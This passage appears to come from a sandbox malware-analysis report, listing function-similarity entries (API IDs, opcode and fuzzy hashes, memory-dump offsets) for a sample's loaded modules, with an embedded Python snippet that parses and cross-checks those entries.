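• String ID: %.*s$%s%c$\\
• API String ID: 4241100979-1685191245
• Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
• Instruction ID: 32be83ce6d4a459b06ada111c58a9cbcabf97a4ca1fea3de9b4d79cda10e9477
• Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
• Instruction Fuzzy Hash: D531B061619AC145EB21AB21F8507EAA354FF88BE4F840331EE7D47BC9EE2CD645C790
APIs
  • Part of subcall function 00007FFBBCD45508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBBCD4108E), ref: 00007FFBBCD45516
• terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBCD4112E
Strings
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: abortterminate
• String ID: MOC$RCC$csm
• API String ID: 661698970-2671469338
• Opcode ID: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
• Instruction ID: 554f642da4ab28a5db7cb3dd76db8d78241d499f195cd5c159895385abe14e0d
• Opcode Fuzzy Hash: 1e1d061888eb5ed8958d1a3f543fee4a516cb38e8faaed4a66704169c3245728
• Instruction Fuzzy Hash: BFF04FFAB18606C2E7509FB9E18A07C3764FB48F40F095132D7480625ADF3CD490C705
"""

@dataclass
class FunctionRecord:
    apis: list[str] = field(default_factory=list)      # call text as printed in the entry
    api_refs: list[int] = field(default_factory=list)  # call-site addresses
    source_file: str = ""
    image_base: int = 0
    fields: dict[str, str] = field(default_factory=dict)  # Snapshot File, API ID, Opcode ID, ...

    def api_names(self) -> list[str]:
        # "abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(...)" -> "abort"
        return [a.split("(", 1)[0].split(".", 1)[0] for a in self.apis]

def parse_records(text: str) -> list[FunctionRecord]:
    records, current, section = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if line == "APIs":                      # every entry opens with its APIs block
                current = FunctionRecord()
                records.append(current)
            continue
        if current is None:
            raise ValueError(f"field before first entry: {line!r}")
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unparsed API line: {line!r}")
            current.apis.append(m["call"])
            current.api_refs.append(int(m["ref"], 16))
        elif section == "Memory Dump Source":
            if m := SRC_RE.match(line):             # "Associated" dump lines are not kept
                current.source_file, current.image_base = m["file"], int(m["base"], 16)
        elif section != "Strings":                  # IDA Plugin / Similarity: "Key: Value"
            key, _, value = line.lstrip("• ").partition(": ")
            current.fields[key] = value
    return records

def check_record(rec: FunctionRecord) -> list[str]:
    """Flag fields that should agree within one entry but do not."""
    problems = []
    if rec.fields.get("Opcode ID") != rec.fields.get("Opcode Fuzzy Hash"):
        problems.append("Opcode ID differs from Opcode Fuzzy Hash")
    m = SNAP_RE.match(rec.fields.get("Snapshot File", ""))
    if not m or int(m["base"], 16) != rec.image_base:
        problems.append("snapshot base does not match dump Offset")
    if any(ref < rec.image_base for ref in rec.api_refs):
        problems.append("API call site below image base")
    return problems

def apis_by_image(records: list[FunctionRecord]) -> dict[int, set[str]]:
    """Imports referenced by the recorded functions of each loaded image."""
    out: dict[int, set[str]] = {}
    for r in records:
        out.setdefault(r.image_base, set()).update(r.api_names())
    return out
```

Run over a full export of these entries, `apis_by_image` separates the imports used by the bootloader image from those of the CRT and extension-module images, which is the quickest way to decide which dumped module to open first; `check_record` catches copy or extraction damage in the hashes and addresses before they are used for lookups against other reports.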
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Long$Long_OccurredStringUnsigned
                                                                                                                                                                                                      • String ID: Value too large for lzma_mode type
                                                                                                                                                                                                      • API String ID: 944333170-1290617251
                                                                                                                                                                                                      • Opcode ID: f90cae6687b7eaa245f2c34b10f9a5b2d7e4aa1b650dbb0da9f8c22bb116e6df
                                                                                                                                                                                                      • Instruction ID: 0ec5f7d11e039eb66e786921364c6d0dcd7d23a701c8aa34b9468ec19e760e97
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f90cae6687b7eaa245f2c34b10f9a5b2d7e4aa1b650dbb0da9f8c22bb116e6df
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55F0DAA5E1964382EA548F39F884134F3A0BF48B84F58E435DB0F46264CE3CEC568308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Long$Long_OccurredStringUnsigned
                                                                                                                                                                                                      • String ID: Value too large for lzma_match_finder type
                                                                                                                                                                                                      • API String ID: 944333170-1161044407
                                                                                                                                                                                                      • Opcode ID: 01b0d04b65a256c979aae82caa2847c0d8423915d3bc3bd068b60acce2f2a1cf
                                                                                                                                                                                                      • Instruction ID: e3d9be6fa768cd217569432b046234ccaef4de3e1826c3b0f25d38ff3fec293a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01b0d04b65a256c979aae82caa2847c0d8423915d3bc3bd068b60acce2f2a1cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0D4A1B1964282EA548F39F888138F3A0BF48B84F18A434EB4F46274DE3CEC558308
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2718003287-0
                                                                                                                                                                                                      • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction ID: 524178aa164c67a5b5d14dcd063152a926598bebfe668d04ac25221016ce5405
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4D102B2B18AC28AE724DF64D4441EC7771FB44798B848225DE7D97BD9DE38D016C390
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D0EC
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FF59CFBB), ref: 00007FF7FF59D177
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                      • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction ID: cef920b1496819e1980775ef83826ecafb258c76f2f942745081a0b4e0fbf0dd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2591E732F1869285F774AF6594402FDABA0BB40788F944235DE7E536D4EE3CD442C7A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2943138195-0
                                                                                                                                                                                                      • Opcode ID: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                      • Instruction ID: dce35f53510821166d8e8d3abb230a172c564d6cc6b6276a234d94c9bba7d76f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21ceaebb6340b33c2880b1d94455a3a587ac808d2dbe1c8140b81e3c0e4e29dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4917CEAF08A92C9FB10CB79D8883BC37A1BB04788F544036DB5D67694DF79A846C344
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                      • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction ID: 6d9a180b653529e0fa2ef35c5871fd47761ea4722ef20f83899a1128368b7108
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F651F872F0819186FB28EF2499556FCA7A2AB00358F914335DE3E53AE5DF38E401C790
                                                                                                                                                                                                      APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction ID: c66ffc659509a44edf585ef93c600a7054aa9cfe150748ff6a9b4cafb3a9e980
• Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
• Instruction Fuzzy Hash: 1B51BF22E086818AFB28EF71D4503FDA3E1AB44B58F948635DE2D476C9DF38D460C3A0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
• Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
Similarity
• API ID: Name::operator+
• String ID:
• API String ID: 2943138195-0
• Opcode ID: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
• Instruction ID: 76aff433f5fdfb286c9ed7dda517efc29781528c75e95f0c21c6f8c121aff8d5
• Opcode Fuzzy Hash: 0bd3be82ad391ae9cd5c01d857b5e8d25ae8efb4ad2905c542e999dede7c0f10
• Instruction Fuzzy Hash: 084166FAB08B8499EB01CFB8C8483AC37A0FB58B48F588125CB4D6B749DF789841C754
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: ea22a9ceabe4f21caf947149c83ca4085102e6e9c6bc832b16de07e8bfdef316
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: 5A11E521F0C5C282FB54A76AE5442F99A92FB88780FD88230DB7907BD9CD7DD5D1C2A0
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
• Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
Similarity
• API ID: DeallocFreeMem_Thread_free_lock
• String ID:
• API String ID: 2783890233-0
• Opcode ID: 4f5a2f9c344497e93ef028251fd81299d8f3afbb09a68fff93368c8b0e6b2a83
• Instruction ID: 358acf1180b38118e3eb6dceb59771832f1a0eec72833d9cc836adba8c26595d
• Opcode Fuzzy Hash: 4f5a2f9c344497e93ef028251fd81299d8f3afbb09a68fff93368c8b0e6b2a83
• Instruction Fuzzy Hash: E911E8A2A0994285EE5D8B7ADD94378A360FB48B95F589130DB1F42574CF2CE8958308
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction ID: d956370f095327b0a8fec152f3f840f2f1dfe7a48a71acb42c300fac3105d4b8
• Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
• Instruction Fuzzy Hash: 15114C22B15B458AEB00DB60E8542F973B4FB19758F840E31DA3D477A4DF38D1648390
APIs
Memory Dump Source
• Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
• Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 925f1272a8eec2639c20e383994221c7073682bc52a01940fe0b830d159c3720
• Instruction ID: 889bdc18d39292b128fd983dd8ded0ea3e8b30374b7c8ac14a7160539876e21c
• Opcode Fuzzy Hash: 925f1272a8eec2639c20e383994221c7073682bc52a01940fe0b830d159c3720
• Instruction Fuzzy Hash: 6F114C62B14F058AEB008F78EC452A873A4FB59B98F040E31DB6E427A8DF3CD955C340
APIs
Memory Dump Source
• Source File: 00000002.00000002.1498820665.00007FFBAA8A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFBAA8A0000, based on PE: true
• Associated: 00000002.00000002.1498796628.00007FFBAA8A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAAB56000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAAB77000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAAB86000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAAB90000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAABD2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAACA1000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1500545912.00007FFBAADB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1503754396.00007FFBAADC8000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1503793241.00007FFBAADCD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1503828649.00007FFBAADCE000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1503984244.00007FFBAADCF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1504010283.00007FFBAADD0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1504054929.00007FFBAADF6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1504180502.00007FFBAADF8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1504224238.00007FFBAAE00000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507037076.00007FFBAAE41000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507137885.00007FFBAAE75000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507175590.00007FFBAAE9D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507199272.00007FFBAAEA0000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507224854.00007FFBAAEA1000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507252662.00007FFBAAEA2000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.1507284955.00007FFBAAEA3000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507323660.00007FFBAAEA5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507400615.00007FFBAAEB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507400615.00007FFBAAEB9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507461882.00007FFBAAEE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507486913.00007FFBAAEE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbaa8a0000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 4c843af704d4999d6b1dd3508e9d37868a4ccb8a5710554f336d0007bef571e5
                                                                                                                                                                                                      • Instruction ID: b6727e45d5f7fc51a5e928a301123973d36d8bd56cc3b0546c89e3b1a2a03b66
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c843af704d4999d6b1dd3508e9d37868a4ccb8a5710554f336d0007bef571e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09114F66B15F02C9EB00CF70E8542A833A8FB19758F440A35EE6D42794DF38D1558350
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: aed7f86fc7a11c6df5e40bac6b102b5ddb6009efbef7b18aee2bd32e475f136b
                                                                                                                                                                                                      • Instruction ID: ca9a1274d1e67a83e37104031b8fea4f4dafdc8df778e9126140513feea157d9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: aed7f86fc7a11c6df5e40bac6b102b5ddb6009efbef7b18aee2bd32e475f136b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C1115A6B14F018AEB00CF74EC543B873A4FB19758F445A31EB6E867A4DF78D5988340
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
